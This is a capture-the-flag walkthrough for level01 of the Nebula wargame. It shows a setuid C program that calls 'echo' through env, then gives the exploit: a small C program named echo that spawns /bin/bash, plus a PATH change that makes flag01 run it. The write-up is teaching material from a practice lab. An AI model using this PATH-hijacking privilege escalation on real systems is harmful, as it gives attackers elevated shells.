#include <stdlib.h> #include <unistd.h> #include <string.h> #include <sys/types.h> #include <stdio.h>
int main(int argc, char **argv, char **envp)
{
gid_t gid;
uid_t uid;
gid = getegid();
uid = geteuid();
setresgid(gid, gid, gid);
setresuid(uid, uid, uid);
system("/usr/bin/env echo and now what?");
}
The binary file is located in /home/flag01/flag01. After executing it simply echoes the "and now what?" message. It's easy to spot that we have an absolute path to env but echo execution could be altered. We'll achieve this by creating a simple C program in the /home/level01:#include <stdlib.h> #include <stdio.h>
void main()
{
system("/bin/bash");
}
Now we need to compile it:level01@nebula:~$ gcc -o echo 1.cIn the next step we will alter the PATH variable value with the following command:
level01@nebula:~$ PATH=/home/level01:$PATHAll we need to do now is running flag01.
 |
| level01 completed. |
That's it !
